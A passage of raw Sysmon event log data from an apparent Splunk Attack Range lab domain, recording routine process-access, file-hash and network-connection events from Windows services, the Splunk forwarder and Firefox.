System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.242{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:13.242{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:13.242{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:13.241{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:13.241{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001049616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.240{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4EFD2514AFC3B92874763A8C664B8453,SHA256=1CDED4415F152EBC4CE3F8159416F692E141C43947BF503A78920B8A67C758C8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:04.652{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT 
AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51055-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001049614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:04.652{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51055-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001049613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:04.547{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-890.attackrange.local51054-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001049612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:04.546{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51054-false10.0.1.14win-dc-890.attackrange.local389ldap 23542300x80000000000000001049611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.143{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC8376FEA70A64EA8031A547E0D5A6EE,SHA256=F4DE13C95C62540E93EB1602FCB7CC75A3B94697232D5BCBA9B49CAAB0EE8C49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807882Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:13.000{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D83F8D76E6DE78391B7679E14B059B7F,SHA256=39B9276CDCB9AE77BFE003B5E651102D2DC3306A10A100F42078C0A2A8BFC6F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:14.490{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE2F45E8D778307F2DFC31823FA125A8,SHA256=F9E4DEDD3286F4536C794175A4FDA68EBB87B17024AFCA800D5537C1B85425ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807883Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:14.016{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDCFB1BC921038A7829383D44719C3A6,SHA256=3E5AFD2FD1B34FC9BCC06A60052A350E74F633E050A370DA24B16F198F02DCD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:15.521{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85057C0964DA90D5800D6753DCDDC4AF,SHA256=16A5590AFD8969F8EC42151E177B8DE70B9412258369FD9A045389C09A3C91F0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807885Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:14.257{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57290-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807884Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:15.028{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3671A38313717E2F4AB012F92F748873,SHA256=3437DCB0777FBFD73683BB15DE65F2913CF3A91180F546D198E09EAAD5AB14E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:15.420{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=78023BC7364E71E9600DD90E2F1CF64E,SHA256=1A11E24ACA07C8F0A396519B2E6EFFE3EF6BCFC1D332C3D971A68D9F5C3F55C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.541{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42F5917CB1CF6016253F5A8F1AE0B37C,SHA256=5F41D530EE81C96F8D5F461C63EEA9D7F63C26E761BAD9EEA163C1B5301015F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807886Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:16.044{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=288D4873A9DEDDB89D801E5B156AF840,SHA256=AE392508FAC602B7301D1ECF6022AB1C3D6AA8B3BCFC4310E4D06B2B9DE33DE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.242{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9AFCB12D7A00A064DDDC659880E82646,SHA256=D3CC681FDBE495D597A661A1AAA4B6C3FD45127E6A5C14D4C0C19C577B601322,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.242{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=09C43B2F99352EF8D6E990BF0242DDF0,SHA256=59E7B5871B806258EE4E75BA1CC2D9692B9BD48D3355E93A6D14F5A6D242C5D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.242{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B25290870D6AD0817133B32E31FE81A6,SHA256=95180366854441918B1A395F30A9A21D7F8FC0F449C0B030546F3D7468E9D950,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:16.242{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9D975FC81A7B387E4858AC95191C10BB,SHA256=B94B35824257F9925504DA9BBA6FA90B0357EBCA58120579219A25E58D51A120,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.242{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=710808B040AE21CDB087C3E9BC404663,SHA256=89F53BA67E575C1F296E0A4B8158140DE212A2160EBAE4555228E4B0E95B593D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.242{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=460282B87930D028B0DF24E78F4646E2,SHA256=D3A0AA6F27178172645B3BB017BDBE39BA57E2A7C1DA459CB388BEE98D69E3EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.242{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=33B7BA910580DA63DA25DEF3854722DD,SHA256=0A643619FF4DF954E0D2568050FA85362CC7540BD8FE978A5E1F28DFC998BC25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:16.241{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1F3D631E892A7B6DE79C3516D97AE1F3,SHA256=7165FD8B2345EFF94BDDD8DC9838C2D6651E69AA91F8BFD8DB89EA0C96F95AF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.240{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C74E1F6A33FC786C71FAA2FB116E2ACC,SHA256=D143886F602570CA849BF1E7DF1FB1C269AE62191178841995BDC03DF44A2FDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.239{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=022C42B4A3195EBD0CF9A1E46756B8EE,SHA256=98834491B6111513F5687BCC46FAE1DD82513627BF01C5708AA1CC54B9B375F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.237{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=815E81943E8322A0631FAF29492053CC,SHA256=56D17000658D78F5EEF737B06CC074518F1E7B0661D5C6110BEBB404A47C6F0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:17.556{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7159E6C5A575931ABF651714B046E6E6,SHA256=52BCA0982A6A6424204E206365433E70F84B512F4A3DC02C3430357BE1F87014,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807887Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:17.075{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3831C0D9435B6D2CC93EDA17B5BFE313,SHA256=391F2033DCBA6CD8852A9B6DFE25185EB0FBFF6AE571D4E2DCFADE9AF64018DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:08.730{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51057-false10.0.1.12-8000- 354300x80000000000000001049651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.947{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51056-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001049650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.947{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51056-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 
23542300x80000000000000001049670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.570{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2624168B40AE420D590A631371E8822D,SHA256=C3B58326BD4236031DCD5DB24793A4487058153834C346861229DE2E2B882C51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807888Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:18.107{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C39EAB4279BD2E5A6AA972079893C8B9,SHA256=B07A993D2BA22827AD43C047B0B58D4DA2EC5FF8BEBED51F8CC12A5A18A0E1AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.302{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:18.086{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+59c7f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001049667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:18.086{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\Syst